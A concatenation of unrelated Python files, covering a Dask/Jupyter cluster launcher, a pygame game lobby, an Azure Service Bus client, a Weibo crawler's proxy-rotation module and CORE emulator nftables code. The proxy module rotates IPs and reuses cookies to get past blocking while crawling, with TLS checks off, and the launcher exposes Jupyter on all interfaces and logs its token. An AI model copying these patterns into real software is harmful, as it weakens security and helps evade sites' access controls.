return PeriodicTimer(interval, function, args, kwargs, stop_on_exception)
class AtomicInteger(object):
def __init__(self, value=0):
self._value = value
self._lock = threading.Lock()
def inc(self):
with self._lock:
self._value += 1
return self._value
def dec(self):
with self._lock:
self._value -= 1
return self._value
def get(self):
with self._lock:
return self._value
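# Usage sketch (illustrative only, not part of the original module):
#
#   counter = AtomicInteger()
#
#   @AsyncThread
#   def do_work():
#       counter.inc()                 # runs in a background thread; exceptions are logged
#
#   do_work()                         # returns the started threading.Thread
#
#   def tick():
#       print(counter.get())
#       return True                   # a truthy return keeps the PeriodicTimer rescheduling
#
#   t = timer(5, tick)                # fire tick() every 5 seconds
#   t.start()
#   ...
#   t.cancel()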
|
startDask.py
|
import os
import argparse
import time
from dask.distributed import Client
import sys, uuid
import threading
import subprocess
import socket
import mlflow
from notebook.notebookapp import list_running_servers
def write_freeze():
# log pip list before doing anything else
from pathlib import Path
import os
Path("./outputs").mkdir(parents=True, exist_ok=True)
os.system("pip list > outputs/pip_list.txt")
def flush(proc, proc_log):
while True:
proc_out = proc.stdout.readline()
if proc_out == "" and proc.poll() is not None:
proc_log.close()
break
elif proc_out:
sys.stdout.write(proc_out)
proc_log.write(proc_out)
proc_log.flush()
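# Invocation sketch (an assumption inferred from the argparse setup below, not a
# documented CLI): MASTER_ADDR/MASTER_PORT/RANK are expected to be set by the
# job launcher; rank 0 starts Jupyter, the Dask scheduler and a worker, while
# the other ranks only start workers. Unrecognised arguments are forwarded to
# the user script, e.g.
#
#   python startDask.py --script train.py --epochs 10
#
# where train.py and --epochs are placeholders for the user's own driver script
# and its arguments.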
if __name__ == "__main__":
write_freeze()
parser = argparse.ArgumentParser()
parser.add_argument("--jupyter_token", default=uuid.uuid1().hex)
parser.add_argument("--script")
args, unparsed = parser.parse_known_args()
for k, v in os.environ.items():
if k.startswith("MLFLOW"):
print(k, v)
MLFLOW_RUN_ID = os.getenv("MLFLOW_RUN_ID")
print("- env: MASTER_ADDR: ", os.environ.get("MASTER_ADDR"))
print("- env: MASTER_PORT: ", os.environ.get("MASTER_PORT"))
print("- env: RANK: ", os.environ.get("RANK"))
print("- env: LOCAL_RANK: ", os.environ.get("LOCAL_RANK"))
print("- env: NODE_RANK: ", os.environ.get("NODE_RANK"))
rank = os.environ.get("RANK")
ip = socket.gethostbyname(socket.gethostname())
master = os.environ.get("MASTER_ADDR")
master_port = os.environ.get("MASTER_PORT")
print("- my rank is ", rank)
print("- my ip is ", ip)
print("- master is ", master)
print("- master port is ", master_port)
scheduler = master + ":8786"
dashboard = master + ":8787"
print("- scheduler is ", scheduler)
print("- dashboard is ", dashboard)
print("args: ", args)
print("unparsed: ", unparsed)
print("- my rank is ", rank)
print("- my ip is ", ip)
if not os.path.exists("logs"):
os.makedirs("logs")
print("free disk space on /tmp")
os.system(f"df -P /tmp")
if str(rank) == "0":
mlflow.log_param("headnode", ip)
mlflow.log_param(
"cluster",
"scheduler: {scheduler}, dashboard: {dashboard}".format(
scheduler=scheduler, dashboard=dashboard
),
)
cmd = (
"jupyter lab --ip 0.0.0.0 --port 8888"
+ " --NotebookApp.token={token}"
+ " --allow-root --no-browser"
).format(token=args.jupyter_token)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
jupyter_log = open("logs/jupyter_log.txt", "w")
jupyter_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
jupyter_flush = threading.Thread(target=flush, args=(jupyter_proc, jupyter_log))
jupyter_flush.start()
# while not list(list_running_servers()):
# time.sleep(5)
# jupyter_servers = list(list_running_servers())
# assert (len(jupyter_servers) == 1), "more than one jupyter server is running"
mlflow.log_param(
"jupyter", "ip: {ip_addr}, port: {port}".format(ip_addr=ip, port="8888")
)
mlflow.log_param("jupyter-token", args.jupyter_token)
cmd = (
"dask-scheduler "
+ "--port "
+ scheduler.split(":")[1]
+ " --dashboard-address "
+ dashboard
)
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
scheduler_log = open("logs/scheduler_log.txt", "w")
scheduler_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
scheduler_flush = threading.Thread(
target=flush, args=(scheduler_proc, scheduler_log)
)
scheduler_flush.start()
cmd = "dask-worker " + scheduler
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
worker_log = open("logs/worker_{rank}_log.txt".format(rank=rank), "w")
worker_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
worker_flush = threading.Thread(target=flush, args=(worker_proc, worker_log))
worker_flush.start()
if args.script:
command_line = " ".join(["python", args.script] + unparsed)
print("Launching:", command_line)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
driver_log = open("logs/driver_log.txt", "w")
driver_proc = subprocess.Popen(
command_line.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
driver_flush = threading.Thread(
target=flush, args=(driver_proc, driver_log)
)
driver_flush.start()
# Wait until process terminates (without using p.wait())
# while driver_proc.poll() is None:
# # Process hasn't exited yet, let's wait some
# time.sleep(0.5)
print("waiting for driver process to terminate")
driver_proc.wait()
exit_code = driver_proc.returncode
print("process ended with code", exit_code)
print("killing scheduler, worker and jupyter")
jupyter_proc.kill()
scheduler_proc.kill()
worker_proc.kill()
exit(exit_code)
else:
flush(scheduler_proc, scheduler_log)
else:
cmd = "dask-worker " + scheduler
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
worker_log = open("logs/worker_{rank}_log.txt".format(rank=rank), "w")
worker_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
flush(worker_proc, worker_log)
|
Matchup.py
|
"""
Author: George Macrae
2014
"""
import pygame, pygbutton, sys
from pygame.locals import *
from socket import *
import threading
import Start
import textbox
import Setup
FPS = 30
WINDOWWIDTH = 860
WINDOWHEIGHT = 700
WHITE = (255, 255, 255)
RED = (255, 0, 0)
BLUE = (0, 0, 255)
GREEN = (0, 255, 0)
BLACK = (0, 0, 0, 0.8)
DARKGRAY = (20,20,20)
GRAY = (70,70,70)
FONT = pygame.font.SysFont("Arial", 14)
TITLEFONT = pygame.font.SysFont("Arial", 20)
HEADFONT = pygame.font.SysFont("Arial", 34)
global username
username = ""
def drawChallengePanels(screen):
screen.blit(pygame.image.load('images/matchupbg.png').convert_alpha(),(0,0))
label = HEADFONT.render('Welcome, '+ username, 1, (255,255,255))
screen.blit(label, (300, 20))
screen.blit(pygame.image.load('images/matchupoverlay.png').convert_alpha(),(20,100))
pygame.draw.rect(screen, DARKGRAY, [20, 100, 400, 30])
screen.blit(TITLEFONT.render("ONLINE: ", 1, WHITE),(180,105))
screen.blit(pygame.image.load('images/matchupoverlay1.png').convert_alpha(),(440,100))
pygame.draw.rect(screen, DARKGRAY, [440, 100, 400, 30])
screen.blit(TITLEFONT.render("CHALLENGES: ", 1, WHITE),(570,105))
def listener(clientsocket,SCREEN):
global buttonlist
global challengelist
global opp
global user
global Set_up
people_list = []
user = 'null'
print 'listening '
while True:
data = clientsocket.recv(1024)
print 'data rec = '+data
if data == 'Signout':
break
elif data == 'Setup':
Set_up = True
break
dataList = data.split(':')
if len(dataList) > 1:
if dataList[1] == 'CHALLENGED':
challenger = dataList[2]
print 'challenger '+str(challenger)
if challenger not in challengelist:
challengelist.append(challenger)
print 'challenge list '+str(challengelist)
elif dataList[1] == 'ACCEPTED':
print 'CHALLENGE ACCEPTED FROM '+str(dataList[2])
opp = dataList[2]
clientsocket.send('SetupA')
Set_up = True
break
else:
people_list = []
people = str(data)[1:-1]
temp_people_list = people.split(", ")
print 'people'+people
if user == 'null':
user = temp_people_list[-1]
if user == '\'\'':
import string
import random
user = ''.join(random.choice(string.lowercase) for x in range(5))
print user
for x in temp_people_list:
if x != user:
people_list.append(x)
for y in challengelist:
if y not in temp_people_list:
challengelist.remove(y)
print 'people list'+str(people_list)
print 'user '+str(user)
buttonlist = setOnlineDisplay(SCREEN,people_list,clientsocket,buttonlist,challengelist)
def setOnlineDisplay(SCREEN, people_list, clientsocket,buttonList,challengelist):
print "update screen"
drawChallengePanels(SCREEN)
buttonExit = pygbutton.PygButton((WINDOWWIDTH/2-60, 630, 120, 30), 'Log Out')
buttonExit.draw(SCREEN)
x = 150
buttonList = []
for y in people_list :
SCREEN.blit(pygame.image.load('images/matchupnamebg.png').convert_alpha(),(20,x-20))
l = str(y)[1:-1].split(';')
print "Y STRING " +y
person = FONT.render(l[0],1,GREEN)
SCREEN.blit(person,(40,x))
wins = FONT.render("Wins: "+str(l[2]), 1, WHITE)
loss = FONT.render("Losses: " + str(l[4]), 1, WHITE)
SCREEN.blit(wins,(40, x+20))
SCREEN.blit(loss,(110, x+20))
button = pygbutton.PygButton((300,x+5,100,30), "challenge")
button.draw(SCREEN)
buttonList.append((button,str(y)))
x = x + 80
x = 150
for c in challengelist:
SCREEN.blit(pygame.image.load('images/matchupnamebg.png').convert_alpha(),(440,x-20))
ch = 'chal'+str(c)
l = c.split(';')
msg = str(l[0]) + " has sent you a challenge!"
SCREEN.blit(FONT.render(msg,1,(255,255,255)),(460,x+10))
button = pygbutton.PygButton((720,x+5,100,30), "accept")
button.draw(SCREEN)
buttonList.append((button,ch))
x = x + 80
pygame.display.update()
return buttonList
def start(clientsocket,un):
global username
username = un
print 'Matchup'
global SCREEN
SCREEN = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))
pygame.display.set_caption("Match up")
drawChallengePanels(SCREEN)
buttonExit = pygbutton.PygButton((WINDOWWIDTH/2-60, 630, 120, 30), 'Log Out')
buttonExit.draw(SCREEN)
pygame.display.update()
clientsocket.send('Matchup:'+un)
print 'T1 '+ str(threading.activeCount())
l_thread = threading.Thread(target = listener, args = (clientsocket,SCREEN))
global opp
global buttonlist
global challengelist
global user
global Set_up
user = 'null'
challengelist = []
buttonlist = []
l_thread.start()
Set_up = False
print 'T2 '+ str(threading.activeCount())
while True :
# drawChallengePanels(SCREEN)
# buttonExit.draw(SCREEN)
if Set_up == True:
Setup.start(clientsocket,opp,user,username)
break
for event in pygame.event.get():
if 'click' in buttonExit.handleEvent(event):
clientsocket.send("Signed Out:"+str(username))
# May need to lock
clientsocket.close()
print 'Back-matchup'
Start.main()
break
if not buttonlist:
continue
for x in buttonlist:
req = x[1]
if 'click' in x[0].handleEvent(event):
# button press to accept challenge
if req[0:4] == 'chal':
clientsocket.send("Accept:"+req[4:])
clientsocket.send("SetupC")
opp = req[4:]
else:
# button press to send challenge
clientsocket.send("Challenge:"+x[1])
|
client.py
|
"""
Receives notifications from the remote queue.
"""
# pylint:disable=W0212
# pylint:disable=W0703
import threading
import logging
import json
from azure.servicebus import ServiceBusService
MESSAGE_WAIT_AFTER_ERROR = 5
MESSAGE_WAIT_TIMEOUT = 5
SBS_TOPIC_NAME = "webhooks"
SBS_SUBSCRIPTION_NAME = "RPiOneSubscription"
SBS_KEY_NAME = "ListenFromTopic"
class Client(object):
"""Client for ServiceBusService"""
def __init__(self, sbs_namespace, sbs_access_key):
if not sbs_namespace:
raise ValueError("'sbs_namespace' is required")
if not sbs_access_key:
raise ValueError("'sbs_access_key' is required")
self._logger = logging.getLogger(__name__)
self._sbs = ServiceBusService(service_namespace=sbs_namespace,
shared_access_key_name=SBS_KEY_NAME,
shared_access_key_value=sbs_access_key)
self._stop_event = None
self._thread = None
self._last_sequence = None
def start(self):
"""starts subscription"""
        if self._thread is not None:
raise Exception("Client already started")
self._logger.info("Starting client for host %s", self._sbs._get_host())
self._stop_event = threading.Event()
self._thread = threading.Thread(target=self._receive_messages)
self._thread.daemon = True
self._thread.start()
def stop(self):
"""stops subscription"""
if self._thread is None:
raise Exception("Client is not started")
self._logger.info("Stopping client. May take up to %d seconds", MESSAGE_WAIT_TIMEOUT)
self._stop_event.set()
self._thread.join()
self._thread = None
self._stop_event = None
self._logger.info("Client stopped")
def _receive_messages(self):
"""Receieves messages from service"""
while not self._stop_event.is_set():
try:
message = self._sbs.receive_subscription_message(SBS_TOPIC_NAME,
SBS_SUBSCRIPTION_NAME,
timeout=MESSAGE_WAIT_TIMEOUT,
peek_lock=False)
except Exception:
self._logger.exception("Error while pulling message from topic")
self._stop_event.wait(MESSAGE_WAIT_AFTER_ERROR)
continue
if message is None or message.body is None:
self._logger.debug("No message received after waiting %d seconds",
MESSAGE_WAIT_TIMEOUT)
else:
sequence = message.broker_properties[u'SequenceNumber']
sent_on = message.broker_properties[u'EnqueuedTimeUtc']
body = message.body
self._logger.info("Message with sequence '%s' sent on '%s' receieved: %s",
sequence, sent_on, body)
                if self._last_sequence is not None and self._last_sequence > sequence:
self._logger.warning("Skipping message with sequence '%s' because the later"\
" one with sequence '%s' was already processed",
sequence, self._last_sequence)
else:
self._last_sequence = sequence
try:
self._process_message(body)
except Exception:
self._logger.exception("Failed to process a message")
def _process_message(self, message_body):
"""Process single message"""
parsed_message = json.loads(message_body)
msg_sender = parsed_message[u'name']
msg_text = parsed_message[u'text']
msg_type = parsed_message[u'type']
if not msg_sender or not msg_text or not msg_type:
raise ValueError("One of requried parameters is missing")
|
proxy.py
|
import requests
import time
import random
import sys
from multiprocessing import Process, Manager, current_process
sys.path.append('..') # For unit test
from logger import crawler
from config import headers, conf
from login import get_cookies
from page_parse.basic import is_404
from db.redis_db import Cookies
DAXIANG_URL = 'http://tvp.daxiangdaili.com/ip/?tid={}&num={}&delay=2&category=2&longlife=5'
MOGU_URL = 'http://piping.mogumiao.com/proxy/api/get_ip_bs?appKey={key}&count={num}&expiryDate=5&format=2'
TEST_URL = 'http://help.weibo.com/ask' # Weibo Help page
BASE_URL = 'http://weibo.com/p/{}{}/info?mod=pedit_more'
COOKIES = get_cookies()
class Proxy():
def __init__(self):
self.manager = Manager()
self.PROXY_IP = self.manager.dict()
self.Cache = self.manager.Queue()
self.Flag = self.manager.Value('i', 0)
ip_list = self.request_ip(10)
for i in ip_list:
self.Cache.put(i)
def make_proxy_head(self, proc_name):
if proc_name in self.PROXY_IP:
return self.make_proxy_head_with_ip(self.PROXY_IP[proc_name])
@classmethod
def is_ip_port(cls, ip):
ip = ip.strip()
        return ip and ip.count('.') == 3 and ip.count(':') == 1
# Valid ip list will be returned if non_stop==True otherwise this function will stop after one request
@classmethod
def request_ip(cls, num, non_stop=True):
url = MOGU_URL.format(key=conf.moguproxy_order(), num=num)
try:
resp = requests.get(url)
except:
if non_stop:
                crawler.error('Cannot get proxy ip, please check the account')
time.sleep(cls.get_proxy_sleep_time())
return cls.request_ip(num)
else:
return []
        if resp.status_code != 200:
            if non_stop:
                crawler.error('Cannot get proxy ip, please check the account')
time.sleep(cls.get_proxy_sleep_time())
return cls.request_ip(num)
else:
return []
cand_ip = resp.content.decode().split()
cand_ip = [i for i in cand_ip if cls.is_ip_port(i)]
        if len(cand_ip) == 0:
if non_stop:
sleep_time = cls.get_proxy_sleep_time()
crawler.warning('Proxy is empty, try after {}, Return from server: {}'.format(sleep_time,
resp.content.decode()))
time.sleep(sleep_time)
return cls.request_ip(num)
else:
return []
return cand_ip
@classmethod
def make_proxy_head_with_ip(cls, ip):
return {'http': 'http://' + ip}
@classmethod
def get_proxy_sleep_time(cls):
return random.randint(conf.get_proxy_ip_min_req_interal(), conf.get_proxy_ip_max_req_interal())
@classmethod
def check_weibo_help_page(cls, resp):
return resp.status_code == 200 and '微博帮助' in resp.content.decode()
@classmethod
def check_ip(cls, ip):
if '.' not in ip:
crawler.info('Ignore non ip {}'.format(ip))
return False
crawler.info('Checking {}'.format(ip))
count = 0
while count < conf.get_proxy_max_retries():
crawler.info('Check count {}'.format(count))
try:
resp = requests.get(TEST_URL, headers=headers,
timeout=conf.get_proxy_speed_filter(),
proxies=cls.make_proxy_head_with_ip(ip),
verify=False)
if cls.check_weibo_help_page(resp):
crawler.info('{} is available'.format(ip))
return True
except Exception as excep:
                crawler.debug('Exceptions are raised when filtering {}. Here are details: {}'.format(ip, excep))
count += 1
time.sleep(0.2)
crawler.info('Http proxy: ' + ip + ' is filtered out')
return False
def pick_ip_from_list(self, ip_list):
res = ''
for ip in ip_list:
            if res == '' and self.check_ip(ip):
res = ip
else:
self.Cache.put(ip)
return res
def pick_ip_from_cache(self):
try:
if self.Cache.empty():
return ''
ip = self.Cache.get()
if ip and self.check_ip(ip):
return ip
else:
return ''
except Exception as exc:
crawler.info('Fail to get from Cache, message returned is {}'.format(exc))
return ''
def is_proc_set(self, proc_name):
        return proc_name in self.PROXY_IP and self.PROXY_IP[proc_name] != ''
def get_ip(self, proc_name):
if proc_name in self.PROXY_IP:
return self.PROXY_IP[proc_name]
else:
return ''
def set_ip_for_proc(self, proc_name, ip):
self.PROXY_IP[proc_name] = ip
def update_ip(self, proc_name):
ip = self.pick_ip_from_cache()
        if ip == '':
            if self.Flag.value == 1:
time.sleep(self.get_proxy_sleep_time())
self.update_ip(proc_name)
return
            self.Flag.value = 1  # manual lock to slow down the request
cand_ip = self.request_ip(conf.get_proxy_ip_per_request(), non_stop=False)
time.sleep(2) # slow down the request
            self.Flag.value = 0
            if len(cand_ip) == 0:
time.sleep(self.get_proxy_sleep_time())
self.update_ip(proc_name)
return
ip = self.pick_ip_from_list(cand_ip)
            if ip == '':
self.update_ip(proc_name)
return
crawler.info('find one from list {}'.format(ip))
else:
crawler.info('find one from queue {}'.format(ip))
self.set_ip_for_proc(proc_name, ip)
if __name__ == '__main__':
#test = requests.get(TEST_URL, proxies=Proxy.make_proxy_head_with_ip('123.160.34.35:41854'), headers=headers)
#print (test.status_code)
#sys.exit(0)
proxy = Proxy()
m = Manager()
IP = m.list()
print(TEST_URL)
ip_count = 2
print('ip_count', ip_count)
def foo():
global proxy
proxy.update_ip(current_process().name)
global IP
IP.append(proxy.get_ip(current_process().name))
print('IP: {}'.format(IP))
for i in range(ip_count):
print(i)
p = Process(target=foo)
p.start()
p.join()
try:
for i in IP:
print('get_proxies: ', Proxy.make_proxy_head_with_ip(i))
url = BASE_URL.format('100505', '1197219380')
#html = get_page(url, auth_level=1, need_proxy=True)
resp = requests.get(url, headers=headers, cookies=COOKIES, proxies=Proxy.make_proxy_head_with_ip(i),
verify=False)
if resp.text:
page = resp.text.encode('utf-8', 'ignore').decode('utf-8')
if not resp.text or resp.status_code == 414:
print('Invalid IP: ', i)
elif is_404(page):
print('IP 404: ', i)
#resq = requests.get(TEST_URL, proxies=Proxy.make_proxy_head_with_ip(i), headers=headers)
print(resp.status_code)
except Exception as e:
print(e)
pass
|
network.py
|
"""
Defines network nodes used within core.
"""
import logging
import threading
from collections import OrderedDict
from pathlib import Path
from queue import Queue
from typing import TYPE_CHECKING, Dict, List, Optional, Type
import netaddr
from core import utils
from core.emulator.data import InterfaceData, LinkData
from core.emulator.enumerations import (
LinkTypes,
MessageFlags,
NetworkPolicy,
NodeTypes,
RegisterTlvs,
)
from core.errors import CoreCommandError, CoreError
from core.executables import NFTABLES
from core.nodes.base import CoreNetworkBase
from core.nodes.interface import CoreInterface, GreTap, Veth
from core.nodes.netclient import get_net_client
logger = logging.getLogger(__name__)
if TYPE_CHECKING:
from core.emulator.distributed import DistributedServer
from core.emulator.session import Session
from core.location.mobility import WirelessModel, WayPointMobility
WirelessModelType = Type[WirelessModel]
LEARNING_DISABLED: int = 0
class SetQueue(Queue):
"""
Set backed queue to avoid duplicate submissions.
"""
def _init(self, maxsize):
self.queue: OrderedDict = OrderedDict()
def _put(self, item):
self.queue[item] = None
def _get(self):
key, _ = self.queue.popitem(last=False)
return key
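# Illustrative note (not part of the original module): because SetQueue keys the
# backing OrderedDict on the item itself, re-submitting an item that is already
# pending collapses into a single entry, e.g.
#
#   q = SetQueue()
#   q.put("net-a"); q.put("net-a"); q.put("net-b")
#   q.qsize()   # -> 2; the duplicate "net-a" submission was collapsed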
class NftablesQueue:
"""
Helper class for queuing up nftables commands into rate-limited
atomic commits. This improves performance and reliability when there are
many WLAN link updates.
"""
# update rate is every 300ms
rate: float = 0.3
atomic_file: str = "/tmp/pycore.nftables.atomic"
chain: str = "forward"
def __init__(self) -> None:
"""
Initialize the helper class, but don't start the update thread
until a WLAN is instantiated.
"""
self.running: bool = False
self.run_thread: Optional[threading.Thread] = None
# this lock protects cmds and updates lists
self.lock: threading.Lock = threading.Lock()
# list of pending nftables commands
self.cmds: List[str] = []
# list of WLANs requiring update
self.updates: SetQueue = SetQueue()
def start(self) -> None:
"""
Start thread to listen for updates for the provided network.
:return: nothing
"""
with self.lock:
if not self.running:
self.running = True
self.run_thread = threading.Thread(target=self.run, daemon=True)
self.run_thread.start()
def stop(self) -> None:
"""
Stop updates for network, when no networks remain, stop update thread.
:return: nothing
"""
with self.lock:
if self.running:
self.running = False
self.updates.put(None)
self.run_thread.join()
self.run_thread = None
def run(self) -> None:
"""
Thread target that looks for networks needing update, and
rate limits the amount of nftables activity. Only one userspace program
should use nftables at any given time, or results can be unpredictable.
:return: nothing
"""
while self.running:
net = self.updates.get()
if net is None:
break
self.build_cmds(net)
self.commit(net)
def commit(self, net: "CoreNetwork") -> None:
"""
Commit changes to nftables for the provided network.
:param net: network to commit nftables changes
:return: nothing
"""
if not self.cmds:
return
# write out nft commands to file
for cmd in self.cmds:
net.host_cmd(f"echo {cmd} >> {self.atomic_file}", shell=True)
# read file as atomic change
net.host_cmd(f"{NFTABLES} -f {self.atomic_file}")
# remove file
net.host_cmd(f"rm -f {self.atomic_file}")
self.cmds.clear()
def update(self, net: "CoreNetwork") -> None:
"""
Flag this network has an update, so the nftables chain will be rebuilt.
:param net: wlan network
:return: nothing
"""
self.updates.put(net)
def delete_table(self, net: "CoreNetwork") -> None:
"""
Delete nftable bridge rule table.
:param net: network to delete table for
:return: nothing
"""
with self.lock:
net.host_cmd(f"{NFTABLES} delete table bridge {net.brname}")
def build_cmds(self, net: "CoreNetwork") -> None:
"""
Inspect linked nodes for a network, and rebuild the nftables chain commands.
:param net: network to build commands for
:return: nothing
"""
with net.linked_lock:
if net.has_nftables_chain:
self.cmds.append(f"flush table bridge {net.brname}")
else:
net.has_nftables_chain = True
policy = net.policy.value.lower()
self.cmds.append(f"add table bridge {net.brname}")
self.cmds.append(
f"add chain bridge {net.brname} {self.chain} {{type filter hook "
f"forward priority -1\\; policy {policy}\\;}}"
)
# add default rule to accept all traffic not for this bridge
self.cmds.append(
f"add rule bridge {net.brname} {self.chain} "
f"ibriport != {net.brname} accept"
)
# rebuild the chain
for iface1, v in net.linked.items():
for iface2, linked in v.items():
policy = None
if net.policy == NetworkPolicy.DROP and linked:
policy = "accept"
elif net.policy == NetworkPolicy.ACCEPT and not linked:
policy = "drop"
if policy:
self.cmds.append(
f"add rule bridge {net.brname} {self.chain} "
f"iif {iface1.localname} oif {iface2.localname} "
f"{policy}"
)
self.cmds.append(
f"add rule bridge {net.brname} {self.chain} "
f"oif {iface1.localname} iif {iface2.localname} "
f"{policy}"
)
# a global object because all networks share the same queue
# cannot have multiple threads invoking the nftables command
nft_queue: NftablesQueue = NftablesQueue()
class CoreNetwork(CoreNetworkBase):
"""
Provides linux bridge network functionality for core nodes.
"""
policy: NetworkPolicy = NetworkPolicy.DROP
def __init__(
self,
session: "Session",
_id: int = None,
name: str = None,
server: "DistributedServer" = None,
policy: NetworkPolicy = None,
) -> None:
"""
        Creates a CoreNetwork instance.
:param session: core session instance
:param _id: object id
:param name: object name
:param server: remote server node
will run on, default is None for localhost
:param policy: network policy
"""
super().__init__(session, _id, name, server)
if name is None:
name = str(self.id)
if policy is not None:
self.policy: NetworkPolicy = policy
self.name: Optional[str] = name
sessionid = self.session.short_session_id()
self.brname: str = f"b.{self.id}.{sessionid}"
self.has_nftables_chain: bool = False
def host_cmd(
self,
args: str,
env: Dict[str, str] = None,
cwd: Path = None,
wait: bool = True,
shell: bool = False,
) -> str:
"""
Runs a command that is used to configure and setup the network on the host
system and all configured distributed servers.
:param args: command to run
:param env: environment to run command with
:param cwd: directory to run command in
:param wait: True to wait for status, False otherwise
:param shell: True to use shell, False otherwise
:return: combined stdout and stderr
:raises CoreCommandError: when a non-zero exit status occurs
"""
logger.debug("network node(%s) cmd", self.name)
output = utils.cmd(args, env, cwd, wait, shell)
self.session.distributed.execute(lambda x: x.remote_cmd(args, env, cwd, wait))
return output
def startup(self) -> None:
"""
Linux bridge startup logic.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
self.net_client.create_bridge(self.brname)
if self.mtu > 0:
self.net_client.set_mtu(self.brname, self.mtu)
self.has_nftables_chain = False
self.up = True
nft_queue.start()
def shutdown(self) -> None:
"""
Linux bridge shutdown logic.
:return: nothing
"""
if not self.up:
return
nft_queue.stop()
try:
self.net_client.delete_bridge(self.brname)
if self.has_nftables_chain:
nft_queue.delete_table(self)
except CoreCommandError:
logging.exception("error during shutdown")
# removes veth pairs used for bridge-to-bridge connections
for iface in self.get_ifaces():
iface.shutdown()
self.ifaces.clear()
self.linked.clear()
self.up = False
def attach(self, iface: CoreInterface) -> None:
"""
Attach a network interface.
:param iface: network interface to attach
:return: nothing
"""
if self.up:
iface.net_client.set_iface_master(self.brname, iface.localname)
super().attach(iface)
def detach(self, iface: CoreInterface) -> None:
"""
Detach a network interface.
:param iface: network interface to detach
:return: nothing
"""
if self.up:
iface.net_client.delete_iface(self.brname, iface.localname)
super().detach(iface)
def is_linked(self, iface1: CoreInterface, iface2: CoreInterface) -> bool:
"""
Determine if the provided network interfaces are linked.
:param iface1: interface one
:param iface2: interface two
:return: True if interfaces are linked, False otherwise
"""
# check if the network interfaces are attached to this network
if self.ifaces[iface1.net_id] != iface1:
raise ValueError(f"inconsistency for interface {iface1.name}")
if self.ifaces[iface2.net_id] != iface2:
raise ValueError(f"inconsistency for interface {iface2.name}")
try:
linked = self.linked[iface1][iface2]
except KeyError:
if self.policy == NetworkPolicy.ACCEPT:
linked = True
elif self.policy == NetworkPolicy.DROP:
linked = False
else:
raise Exception(f"unknown policy: {self.policy.value}")
self.linked[iface1][iface2] = linked
return linked
def unlink(self, iface1: CoreInterface, iface2: CoreInterface) -> None:
"""
Unlink two interfaces, resulting in adding or removing filtering rules.
:param iface1: interface one
:param iface2: interface two
:return: nothing
"""
with self.linked_lock:
if not self.is_linked(iface1, iface2):
return
self.linked[iface1][iface2] = False
nft_queue.update(self)
def link(self, iface1: CoreInterface, iface2: CoreInterface) -> None:
"""
Link two interfaces together, resulting in adding or removing
filtering rules.
:param iface1: interface one
:param iface2: interface two
:return: nothing
"""
with self.linked_lock:
if self.is_linked(iface1, iface2):
return
self.linked[iface1][iface2] = True
nft_queue.update(self)
def linknet(self, net: CoreNetworkBase) -> CoreInterface:
"""
Link this bridge with another by creating a veth pair and installing
each device into each bridge.
:param net: network to link with
:return: created interface
"""
sessionid = self.session.short_session_id()
try:
_id = f"{self.id:x}"
except TypeError:
_id = str(self.id)
try:
net_id = f"{net.id:x}"
except TypeError:
net_id = str(net.id)
localname = f"veth{_id}.{net_id}.{sessionid}"
name = f"veth{net_id}.{_id}.{sessionid}"
iface = Veth(self.session, name, localname)
if self.up:
iface.startup()
self.attach(iface)
if net.up and net.brname:
iface.net_client.set_iface_master(net.brname, iface.name)
i = net.next_iface_id()
net.ifaces[i] = iface
with net.linked_lock:
net.linked[iface] = {}
iface.net = self
iface.othernet = net
return iface
def get_linked_iface(self, net: CoreNetworkBase) -> Optional[CoreInterface]:
"""
        Return the interface that links this net with another net
        (where the link was created using linknet()).
:param net: interface to get link for
:return: interface the provided network is linked to
"""
for iface in self.get_ifaces():
if iface.othernet == net:
return iface
return None
def add_ips(self, ips: List[str]) -> None:
"""
Add ip addresses on the bridge in the format "10.0.0.1/24".
:param ips: ip address to add
:return: nothing
"""
if not self.up:
return
for ip in ips:
self.net_client.create_address(self.brname, ip)
class GreTapBridge(CoreNetwork):
"""
A network consisting of a bridge with a gretap device for tunneling to
another system.
"""
def __init__(
self,
session: "Session",
remoteip: str = None,
_id: int = None,
name: str = None,
policy: NetworkPolicy = NetworkPolicy.ACCEPT,
localip: str = None,
ttl: int = 255,
key: int = None,
server: "DistributedServer" = None,
) -> None:
"""
Create a GreTapBridge instance.
:param session: core session instance
:param remoteip: remote address
:param _id: object id
:param name: object name
:param policy: network policy
:param localip: local address
:param ttl: ttl value
:param key: gre tap key
:param server: remote server node
will run on, default is None for localhost
"""
CoreNetwork.__init__(self, session, _id, name, server, policy)
if key is None:
key = self.session.id ^ self.id
self.grekey: int = key
self.localnum: Optional[int] = None
self.remotenum: Optional[int] = None
self.remoteip: Optional[str] = remoteip
self.localip: Optional[str] = localip
self.ttl: int = ttl
self.gretap: Optional[GreTap] = None
if self.remoteip is not None:
self.gretap = GreTap(
session,
remoteip,
key=self.grekey,
node=self,
localip=localip,
ttl=ttl,
mtu=self.mtu,
)
def startup(self) -> None:
"""
Creates a bridge and adds the gretap device to it.
:return: nothing
"""
super().startup()
if self.gretap:
self.gretap.startup()
self.attach(self.gretap)
def shutdown(self) -> None:
"""
Detach the gretap device and remove the bridge.
:return: nothing
"""
if self.gretap:
self.detach(self.gretap)
self.gretap.shutdown()
self.gretap = None
super().shutdown()
def add_ips(self, ips: List[str]) -> None:
"""
Set the remote tunnel endpoint. This is a one-time method for
creating the GreTap device, which requires the remoteip at startup.
The 1st address in the provided list is remoteip, 2nd optionally
specifies localip.
:param ips: address list
:return: nothing
"""
if self.gretap:
raise CoreError(f"gretap already exists for {self.name}")
remoteip = ips[0].split("/")[0]
localip = None
if len(ips) > 1:
localip = ips[1].split("/")[0]
self.gretap = GreTap(
self.session,
remoteip,
key=self.grekey,
